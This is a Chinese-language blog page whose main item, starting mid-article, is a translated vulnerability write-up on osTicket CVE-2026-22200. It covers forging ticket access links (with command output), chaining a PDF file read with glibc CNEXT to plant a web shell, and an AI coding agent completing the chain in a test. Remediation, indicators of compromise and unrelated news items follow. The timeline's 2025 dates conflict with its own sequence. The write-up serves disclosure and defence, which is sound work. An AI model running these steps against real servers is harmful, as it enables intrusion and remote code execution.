osTicket默认允许访客用户使用访问链接直接查看工单，无需登录。生成此访问链接有两种方法，其展示了一种较旧但仍有效、且更容易伪造的方法。

该过时方法生成的访问链接基于四个组件构建：

内部工单ID（一个自增的标识符）
外部工单号码（默认为6位数字）
用户电子邮箱
SECRET_SALT值

除SECRET_SALT外，工单访问链接的其他组件均可进行无速率限制的暴力破解。

若启用了用户自助注册（默认），用户注册端点将充当预言机，泄露某个用户邮箱是否已注册，从而实现用户名枚举。osticket_registered_user_enum.py脚本演示了如何实现这一点。

如前所述，用户及其关联的外部工单号码可使用“检查工单访问权限”预言机和osticket_access_bruteforce.py脚本进行高效暴力破解。

内部工单ID是自增标识符，从1开始。综上所述，攻击者可按如下方式伪造一个访问链接：

% python3 osticket_forge_access_link.py 637963 140 'XXX@XXX.com' 'SEFDaIg1UP=Rh0xHE=Ij6Lew8u49L=Tt' http://osticket.example.com[*] 为 ID: 140, 邮箱: XXX@XXX.com 计算哈希...[*] 计算出的哈希 (a): a32056617064315cae1b4d98a8c95772[*] 向链接发送 GET 请求: http://osticket.example.com/view.php[*] 请求参数: {'t': '637963', 'e': 'XXX@XXX.com', 'a': 'a32056617064315cae1b4d98a8c95772'}[+] 请求成功发送。分析响应中...--------------------------------------------------发送的完整 URL: http://osticket.example.com/tickets.php?id=140状态码: 200

结合CNEXT将文件读取升级为远程代码执行

2024年，@cfreal_在glibc的iconv()函数中发现了一个巧妙的基于堆的缓冲区溢出漏洞，编号为CVE-2024-2961（亦称CNEXT）。该漏洞的核心在于，任何PHP文件读取原语都可被转化为远程代码执行。据报道，该漏洞已于2024年与影响Adobe Magento的未认证XML外部实体注入漏洞CVE-2024-34102在野结合利用。研究团队证明，同样的远程代码执行链对CVE-2026-22200也是可行的。

原始利用程序在高级层面上需要知晓PHP进程的内存布局（可从/proc/self/maps文件获取）以及目标上的完整libc.so.6二进制文件，以准确计算偏移量。但如前文“文件读取的特殊性”部分所述，osTicket的PDF生成器将每个“图像”的窃取限制在大约45KB。因此，他们修改了利用程序以适应osTicket。

首先，他们利用文件读取原语读取目标上的/proc/self/maps和部分libc.so.6文件，采用zlib+base64编码。

获取内存布局和libc信息的载荷

将载荷作为回复添加到现有工单后，他们将工单打印为PDF并提取文件。

提取/proc/self/maps和libc信息

接下来，他们使用NT_GNU_BUILD_ID来识别部分获取的libc库，并使用pwntools库从https://libc.rip/下载完整的libc。

根据Build ID下载完整libc

随后，利用完整的libc和/proc/self/maps文件，他们生成了一个CNEXT载荷，用于将Web Shell写入应用程序的Web根目录。

](https://horizon3.ai/wp-content/uploads/2026/01/Screenshot-2026-01-21-at-9.28.49-PM.png)

接着，他们将CNEXT载荷添加到现有工单中，并再次将其导出为PDF以触发漏洞。这将导致内部服务器错误并且连接被重置，但Web Shell将变得可用，而应用程序将继续正常运行。

触发CNEXT载荷后得到Web Shell

AI辅助漏洞利用测试

端到端的漏洞利用序列较为复杂，虽然研究团队可以自行编写一键式利用脚本，但他们很好奇，配备Opus 4.5的Claude Code能否自行将这些步骤组合起来。他们针对运行默认配置的osTicket设置了一场CTF挑战，并在根目录放置了一个随机生成的标志文件。他们向Claude提供了漏洞描述和本报告中概述的步骤提示，并指示Claude仅在需要访问电子邮件时才寻求帮助。

向AI（Claude）提供漏洞利用提示

不到10分钟，Claude就成功完成了挑战，仅在注册账户后需要确认邮件内容时才寻求了一次帮助。

AI成功执行漏洞利用链

修复建议

如果正在运行面向互联网的osTicket实例，应立即更新至最新的osTicket版本 1.18.3 / 1.17.7或更高版本。该补丁通过在调用mPDF之前禁用PHP流包装器来解决CVE-2026-22200。如果在Linux服务器上运行osTicket，还建议检查服务器是否存在CVE-2024-2961并进行修补，该漏洞影响glibc版本 <= 2.39。

如果无法立即打补丁，以下缓解措施有助于阻止匿名攻击者的利用：

实施网络或主机防火墙规则，限制对osTicket服务器的访问。
在管理员面板 -> 用户选项卡中更新osTicket配置，禁用公共用户的自助注册。
在管理员面板 -> 用户选项卡中更新osTicket配置，要求用户注册和登录才能提交工单。
在管理员面板 -> 系统选项卡中更新osTicket配置，禁用线程条目和电子邮件通信中的HTML。

漏洞检测

研究团队提供了一个检测脚本check.py，可用于判断是否在运行过时的osTicket版本。该脚本不直接测试漏洞利用，而是检查1.18.3 / 1.17.7更新中包含的其他变化。

运行漏洞检测检查脚本

入侵指标

以下迹象表明系统可能已遭到利用：

Web服务器访问日志中包含大量对/login.php端点的GET和POST请求，表明可能存在暴力破解工单访问权限的尝试，通常伴有类似python-requests的可疑用户代理。
创建工单或注册账户的数量异常高于正常水平。
Web服务器访问日志条目中包含大量用于将工单打印为PDF的GET请求，例如GET /tickets.php?a=print&id=140。
Web服务器访问日志条目中包含路径很长、并带有PHP过滤器载荷的GET请求，载荷中含有php%3a//和convert.iconv等字符串，通常导致“414 URI过长”错误。
osTicket应用程序的Web根目录中存在Web Shell PHP脚本。

披露时间线

2025年8月28日： Horizon3.ai通过邮件向EnhanceSoft报告PDF文件读取问题，并附带关于90天披露政策的声明。
2025年8月29日： EnhanceSoft确认收到报告。
2025年9月3日： Horizon3.ai报告PDF文件读取问题在与CNEXT结合利用时可导致远程代码执行。同时披露了其他中/低严重性问题（存储型跨站脚本、服务器端请求伪造等）。
2025年9月4日： EnhanceSoft确认收到额外信息。
2025年9月至12月： Horizon3.ai与EnhanceSoft就补丁状态进行了多次沟通。
2025年1月12日： 在向供应商初次披露130多天后，Horizon3.ai公开披露CVE-2026-22200，并通知EnhanceSoft。
2025年1月12日至15日： EnhanceSoft确认漏洞，并与Horizon3.ai合作验证修复程序。
2025年1月15日： EnhanceSoft发布修补版本1.18.3 / 1.17.7。
2025年1月22日： 本研究报告发布。

团队像处理其他零日漏洞一样，作为其快速响应计划的一部分，通知了所有已知的受影响客户，并在NodeZero产品中添加了该漏洞的检测覆盖。

致谢与参考

感谢@_splitline_提出的web2pdf CTF挑战和巧妙的位图图像技巧，以及@cfreal_对CNEXT利用链的突破性发现。

https://osticket.com/osticket-v1-18-3-v1-17-7-available/
https://github.com/horizon3ai/CVE-2026-22200
https://blog.splitline.tw/hitcon-ctf-2022/#%F0%9F%93%83-web2pdf-web
https://blog.lexfo.fr/iconv-cve-2024-2961-p1.html
https://github.com/ambionics/cnext-exploits/blob/main/cnext-exploit.py
https://nvd.nist.gov/vuln/detail/cve-2026-22200
https://nvd.nist.gov/vuln/detail/cve-2024-2961
https://www.cve.org/CVERecord?id=CVE-2025-26241

原文：https://horizon3.ai/attack-research/attack-blogs/ticket-to-shell-exploiting-php-filters-and-cnext-in-osticket-cve-2026-22200/

FBI利用微软提供的BitLocker密钥绕过了“号称无法破解”的加密技术

Sat, 31 Jan 2026 12:47:46 +0800

微软已证实，当收到有效的法院命令或搜查令时，它会与执法机构合作，甚至会向执法机构提供BitLocker恢复密钥。《福布斯》是在关岛的一项联邦欺诈调查后披露这一消息的，在该调查中，联邦调查局（FBI）成功使用微软提供的密钥解锁了三台与新冠肺炎失业援助计划相关的加密笔记本电脑。

这家位于雷德蒙德的科技巨头透露，它每年收到约20份BitLocker密钥的请求。微软遵守合法的政府请求并移交其云基础设施中的密钥，这并非新信息。然而，这是该公司首次公开证实向联邦调查人员交出密钥。

对于那些不熟悉的人来说，大多数现代Windows电脑默认开启BitLocker加密功能，该功能对驱动器进行加密以保障数据安全。不过，Windows经常会提示用户将其48位恢复密钥备份到微软云账户中。这种选择使得微软能够在技术上保留对这些密钥的访问权限，从而在执法部门找上门时可以获取这些密钥。

在关岛的这起案件中，联邦调查局使用从微软获得的密钥绕过了加密，而此前联邦法医专家曾称这种加密是“无法破解的”。法庭文件显示，像国土安全调查局（HSI）这样的机构，若没有特定的恢复密钥，就缺乏破解BitLocker的工具。

微软向执法部门交出密钥的决定，与其竞争对手苹果和Meta形成了对比。苹果和Meta采用零知识架构，恢复密钥采用端到端加密或存储在用户设备上，这意味着即便收到传票，这些公司也无法遵从相关请求。

如今，随着微软配合执法部门的消息被报道，法律专家预计会有更多执法部门请求获取BitLocker密钥。不想让微软存储其密钥的用户，可以登录account.microsoft.com/devices/recoverykey查看自己的账户。在该网站上，用户可以查看密钥是否存储在云端。如果想要更高的安全性，建议采用仅本地存储密钥的方式，例如存储在物理USB驱动器或打印出来的文档中，以重新获得对加密数据的完全控制权

被解雇的游戏公司CEO，把工作室域名劫持拍卖了

Sat, 31 Jan 2026 12:46:29 +0800

每当某些平台出现大规模崩溃，网络上总会流传出一段“内部人士”的聊天记录，其中有模有样地描绘了“删库跑路”的都市传说：某位被裁的程序员心怀不满，趁着手头还有权限时删除数据库或是物理关闭服务器，进而导致公司业务崩溃，实现技术性报复。

当然，大多数时候，“删库跑路”都只是程序员之间发泄工作压力的一句玩笑。然而最近，类似的情节真的在北美的游戏行业发生了。

前几天公示的一则起诉书显示，游戏工作室That's No Moon（以下简称TNM）的联合创始人兼CEO迈克尔·蒙鲍尔，在被解雇的5年后劫持了工作室主页的域名。TNM成立于2020年，据介绍由来自Infinity Ward、顽皮狗等3A工作室的资深人士创办，至今尚未公布任何一款游戏。

据TNM称，蒙鲍尔在担任CEO期间购买了与工作室相关的一系列域名，并以个人名义进行了注册。5年前，他因泄密而被辞退，然而至今仍把工作室域名攥在手上。期间，TNM曾试图通过仲裁拿回网站，最终却因为没有注册商标而被驳回。

直到上周二，前CEO忽然开始对域名下手了：他禁用了工作室的访问权限，还关闭了员工向外部邮箱发送邮件的功能，导致整个团队的员工邮箱直到提交诉状时都没法使用。

就在IT团队忙着抢修邮箱的同时，前CEO又反手把TNM的主页重新定向到了瑞士旅游页面。

如果一个游戏工作室的邮箱域名退信，主页还变成了这样，大概很难不觉得他们要跑路了

而在TNM发函要求归还访问权限后，前CEO则变本加厉地将网站重新定向到了一个域名拍卖网站，并将其挂出了6666666美元的价格。

直到现在，该域名还是不能正常访问

目前尚且没有信息显示双方的矛盾从何而来，不过确实可以看出积怨已久。劫持域名并非突发的泄愤行为，前CEO在被解雇后，不仅在个人社媒上对工作室狂飙垃圾话，甚至在连续三年里向前合伙人发送威胁短信。

起诉书表示，这场风波导致TNM损失了超过100万美元，并且列出了商标侵权、域名抢注、计算机欺诈、侵占、非法侵入动产和违约这一系列控诉，可以感受到工作室方面相当恼火。

值得注意的是，TNM工作室自2020年成立时起，就把名头打得很响。域名劫持带来的跑路嫌疑，确实对TNM有着相当大的杀伤力。前CEO的这一招可以说是既不要面子，也不顾后果了。

而至于TNM打算做什么游戏，进展到哪一步，在公开信息中找不到太多线索。至少目前，这家“3A工作室”给外界留下的最清晰的印象，就只有这场标价6666666美元的“劫域跑路”事件了。

日常随记

Fastadmin框架任意文件读取漏洞 附POC

Fastadmin框架任意文件读取漏洞

泛微E-Mobile 远程命令执行漏洞（RCE）附POC

泛微E-Mobile 远程命令执行漏洞

飞牛系统（fnOS）任意文件读取漏洞 附POC

5 分钟打造你的第一个 NativePHP 移动应用

介绍

最快路径：使用 Jump

步骤 1：在手机上安装 Jump

步骤 2：创建一个 Laravel 项目

步骤 3：安装 NativePHP Mobile

步骤 4：启动 Jump 服务器

步骤 5：扫码启动

刚才到底发生了什么？

完整的打包发布流程

第一个原生功能演示：触觉反馈

在 Livewire 中的写法（PHP）

在 Vue / React / Inertia 中的写法（JavaScript）

CVE-2026-20841 Windows记事本 Markdown RCE

CVE-2026-20841

漏洞介绍

漏洞原理

影响版本

修复建议

复现POC

winrar CVE-2025-8088复现学习

该命令的实际效果

攻击后果

紧急！微软Office零日漏洞CVE-2026-21509已被黑客利用，365/2021用户重启即可，2016/2019需手动改注册表

漏洞核心：绕过OLE防护，黑客可自由执行恶意代码

攻击流程（3步即可中招）

影响范围（覆盖主流Office版本）

分级防护：不同版本的紧急修复方案

方案1：365 Apps/LTSC 2021/2024用户（最简单）

方案2：2016/2019用户（需手动改注册表，高危操作）

详细步骤

额外防护：降低攻击风险的3个好习惯

CVE-2026-22200：osTicket工单直通系统Shell的漏洞剖析

背景

漏洞详解

从汇点入手：mPDF库

第一个障碍：不同版本的mPDF

第二个障碍：HTML净化

绕过HTML净化

组合利用：利用PDF生成功能读取文件

获取工单访问权限

将有效载荷注入工单

处理工单回复

从PDF中提取数据

文件读取的特殊性

任意文件读取的影响

伪造工单访问权限

结合CNEXT将文件读取升级为远程代码执行

AI辅助漏洞利用测试

修复建议

漏洞检测

入侵指标

披露时间线

致谢与参考

FBI利用微软提供的BitLocker密钥绕过了“号称无法破解”的加密技术

被解雇的游戏公司CEO，把工作室域名劫持拍卖了

Fastadmin框架任意文件读取漏洞附POC

飞牛系统（fnOS）任意文件读取漏洞附POC